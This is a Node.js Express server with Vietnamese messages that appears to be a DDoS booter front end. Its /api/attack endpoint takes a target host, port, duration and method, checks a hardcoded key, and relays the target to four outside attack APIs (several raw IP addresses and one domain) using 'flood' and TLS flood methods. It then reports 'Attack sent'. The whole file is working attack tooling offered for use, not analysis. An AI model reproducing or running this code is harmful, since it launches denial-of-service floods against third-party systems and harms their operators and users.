const express = require('express');
const axios = require('axios');
const app = express();
const port = 80;

app.get('/api/attack', async (req, res) => {
  try {
    const key = req.query.key;
    const host = req.query.host;
    const port = req.query.port;
    const time = req.query.time;
    const method = req.query.method;

  if (!key || !host || !time || !method || !port) {
      return res.status(400).send('Sai Định Dạng: -> /api/attack?key=&port=&time=&method=.');
    }

  if (key !== "ngu") {
    const err_key = {
      status: `error`,
      message: `Error Keys`,
    };
    return res.status(400).send(err_key);
  }

  if (time > 120) {
    const err_time = {
      status: `error`,
      message: `Error Time < 60 Second`,
    };
    return res.status(400).send(err_time);
  }
  if (port > 443 || port < 1) {
    const err_time = {
      status: `error`,
      message: `Error Port`,
    };
    return res.status(400).send(err_time);
  }

  if (
    !(
      method.toLowerCase() === "flood" ||
      method.toLowerCase() === "ngu" ||
      method.toLowerCase() === "ngu"
    )
  ) {
    const err_method = {
      status: `error`,
      method_valid: `Error Methods`,
    };
    return res.status(400).send(err_method);
  }

    // Gọi API 1
    const response1 = await axios.get(`http://51.68.214.19/api/attack?username=nat&key=nat&host=${host}&port=${port}&time={time}&method=tls `);
    const data1 = response1.data;

    // Gọi API 2
    const response2 = await axios.get(`https://dovpoapis.fun/api?username=nat&key=2289&host=${host}&port=${port}&time=${time}&method=HTTP-TLS`);
    const data2 = response2.data;

    // Gọi API 3
    const response3 = await axios.get(`http://100.42.183.147:1111/api/attack?host=${host}&port=${port}&time=${time}&method=flood`);
    const data3 = response3.data;

    // Gọi API 4
    const response4 = await axios.get(`http://103.180.147.119:1111/api/attack?host=${host}&port=${port}&time=${time}&method=flood`);
    const data4 = response4.data;

    // Kết hợp dữ liệu từ các API
    const combinedData = {
      data1,
      data2,
      data3,
      data4,
    };

    // Trả về kết quả
    res.json({ message: `Attack sent: key=${key} , host=${host}, port=${port}, time=${time}, method=${method}` });
  } catch (error) {
    console.error(error);
    res.status(500).send('Error API.');
  }
});

app.listen(port, () => {
  console.log(`Server đang chạy tại http://localhost:${port}`);
});